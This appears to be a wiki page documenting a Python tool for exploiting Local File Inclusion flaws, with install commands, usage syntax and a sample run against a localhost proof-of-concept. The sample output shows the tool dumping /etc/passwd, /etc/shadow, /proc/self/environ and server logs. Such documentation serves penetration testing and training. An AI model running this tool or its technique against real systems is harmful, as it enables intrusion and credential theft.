Simple-Local-File-Inclusion-Exploiter
Jump to navigation
Jump to search
Description
Simple Local File Inclusion Exploiter is a Python script that enables to identify if a page is vulnerable to Local File Inclusions (LFI) attacks.
Installation
$ mkdir -p /pentest/web/lfi-sploiter/ $ cd /pentest/web/lfi-sploiter/ $ wget http://packetstorm.linuxsecurity.com/UNIX/scanners/lfi_sploiter.py.txt $ mv lfi_sploiter.py.txt lfi_sploiter.py
Usage
Syntax
$ python lfi_sploiter.py \ --exploit-url="<http://url>" \ --vulnerable-parameter="<parameter>"
Options
Both options are mandatory:
- --exploit-url="<url>"
- URL to exploit (e.g. --exploit-url="http://192.168.1.1/index.php?page=1")
- --vulnerable-parameter="<param>"
- Name of the parameter to exploit (e.g. --vulnerable-parameter="page")
Example
The following example is a proof of concept tested against a vulnerable specific code, that you can download here.
$ python lfi_sploiter.py --exploit-url="http://localhost/poc/LFI/index.php?page=1" \
--vulnerable-parameter="page"
Simple Local File Inclusion Exploiter
by Valentin Hoebel (valentin ( a t ) xenuser ( d o t ) org)
Version 1.0 (21th November 2010) ^__^
(oo)\________
(__)\ )\/\
||----w |
Power to teh cows! || ||
____________________________________________________
[i] Provided URL to exploit: http://localhost/poc/LFI/index.php?page=1
[i] Provided vulnerable parameter: page
[i] Assuming the provided data was correct.
[i] Trying to establish a connection with a random user agent...
[i] Connected to target! URL seems to be valid.
[i] Jumping to the exploit feature.
[i] For exploiting the LFI vulnerability we need to split the URL into its parts.
[i] IP address / domain: localhost
[i] Script: /poc/LFI/index.php
[i] URL query string: page=1
[i] It seems that the URL contains at least one parameter.
[i] Trying to find also other parameters...
[i] No other parameters were found.
[i] The following 1 parameter(s) was/were found:
[i] {'page': '1'}
[i] According to you, the vulnerable parameter should be: page
[i] Checking if this parameter exists in the provided URL...
[i] Found your vulnerable parameter in the URL.
[i] Now trying to find out how this LFI vulnerability can be exploited...
[i] This can take a while.
[+] Found signs of a successfull LFI vulnerability! No nullbyte was required.
[+] URL: http://localhost/poc/LFI/index.php?page=/etc/passwd
[i] Exploiting the LFI vulnerability starts right now.
[i] Trying to dump some interesting files to your local hard disk...
[+] Dumping file: /etc/passwd
[+] Dumping file: /proc/self/environ
[+] Dumping file: /var/log/apache2/access.log
[+] Dumping file: /var/log/apache2/error.log
[+] Dumping file: /etc/shadow
[+] Dumping file: /etc/group
[+] Dumping file: /var/log/auth.log
[+] Dumping file: /proc/self/status
[+] Dumping file: /proc/self/mounts
[+] Dumping file: /proc/cpuinfo
[+] Dumping file: /proc/meminfo
[i] Hint: The files are also dumped when we have no permission to view them.
[i] Instead of the file, the PHP error message will be dumped.
[i] Completed the task. Will now exit!
[i] I know, there is more about LFI than it is covered here, but this will be implemented in later versions of this tool.
[i] Feel free to send in some feedback!